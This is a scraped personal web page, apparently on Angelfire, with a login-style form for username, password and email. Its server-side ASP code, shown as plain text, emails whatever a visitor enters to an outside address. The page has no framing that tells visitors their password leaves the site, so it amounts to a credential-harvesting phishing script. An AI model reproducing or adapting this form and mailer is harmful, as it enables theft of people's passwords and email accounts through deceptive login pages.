Username :

Password :

Email :

<% if request("Nick") <> "" then message = "Username : " & request("Nick") & vbcrlf &_ "Password : " & request("Pass") & vbcrlf &_ "Email : " & request("Email") set cd = server.createobject("CDONTS.newMAIL") cd.to = "upwarez@nana.co.il" cd.from = "upwarez@nana.co.il" cd.Subject = "Email from your Site." cd.body = message cd.bodyformat = 1 cd.mailFormat = 1 Cd.send set cd =nothing end if %>
Site hosted by Angelfire.com: Build your free website today!